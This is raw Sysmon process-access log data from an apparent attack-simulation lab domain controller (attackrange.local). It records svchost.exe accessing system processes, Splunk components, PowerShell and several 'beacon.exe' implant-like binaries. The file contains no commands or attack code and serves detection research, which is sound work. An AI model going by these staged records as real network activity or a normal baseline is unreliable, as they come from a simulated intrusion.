12:24:44.237{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-15AB-6087-FD0C-00000000BA01}5180C:\Users\Administrator\Desktop\beacon2.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441152Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.237{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-1583-6087-F40C-00000000BA01}5820C:\Program Files\OpenJDK\jdk-16.0.1\bin\java.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441151Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.237{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-1427-6087-BD0C-00000000BA01}912C:\Windows\system32\conhost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441150Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.237{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-1427-6087-BC0C-00000000BA01}304C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441149Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.237{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-FB8D-6086-DA09-00000000BA01}520C:\Users\Administrator\Desktop\beacon.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441148Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.236{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-E2C5-6086-F106-00000000BA01}6012C:\Users\Administrator\Desktop\beacon.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441147Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.236{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-DE59-6086-6C06-00000000BA01}6620C:\Users\Administrator\Desktop\beacon.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441146Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.236{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-DE09-6086-6306-00000000BA01}2248C:\Users\Administrator\Desktop\beacon.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441145Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.236{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-DD12-6086-4606-00000000BA01}3432C:\Users\Administrator\Desktop\beacon.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441144Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.236{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-DC40-6086-2F06-00000000BA01}4580C:\Users\Administrator\Desktop\beacon.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441143Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.236{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-DBB1-6086-1806-00000000BA01}4432C:\Users\Administrator\Desktop\beacon.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441142Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.236{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-DB54-6086-1006-00000000BA01}6020C:\Users\Administrator\Desktop\beacon.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441141Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.236{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-D6F1-6086-8605-00000000BA01}5864C:\Windows\system32\conhost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441140Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.236{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-D6F1-6086-8505-00000000BA01}5444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441139Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.236{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441138Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.236{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441137Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.236{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441136Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.236{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-D4CE-6086-F304-00000000BA01}4356C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441135Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.236{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-D4CE-6086-F004-00000000BA01}2052C:\Windows\System32\rdpclip.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441134Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.235{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-D4CD-6086-EC04-00000000BA01}4652C:\Windows\system32\dwm.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441133Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.235{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-D4CC-6086-EA04-00000000BA01}2548C:\Windows\system32\winlogon.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441132Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.235{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CF49-6086-E100-00000000BA01}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441131Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.235{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441130Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.235{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CF3C-6086-AE00-00000000BA01}2188C:\Windows\system32\conhost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441129Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.235{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441128Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.235{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CF24-6086-8C00-00000000BA01}4412C:\Windows\System32\msdtc.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441127Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.235{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CEAB-6086-4100-00000000BA01}3488C:\Windows\system32\conhost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441126Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.235{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CEAA-6086-3900-00000000BA01}3304C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441125Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.235{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2F00-00000000BA01}2136C:\Windows\System32\vds.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441124Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.235{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2D00-00000000BA01}2448C:\Windows\system32\wbem\unsecapp.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441123Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.235{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2C00-00000000BA01}2936C:\Windows\system32\dfssvc.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441122Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.235{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441121Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.235{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2A00-00000000BA01}2900C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441120Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.235{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2900-00000000BA01}2824C:\Windows\system32\dns.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441119Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.235{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2700-00000000BA01}2744C:\Windows\system32\DFSRs.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441118Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.235{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2600-00000000BA01}2736C:\Windows\System32\ismserv.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441117Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.235{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2400-00000000BA01}2712C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441116Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 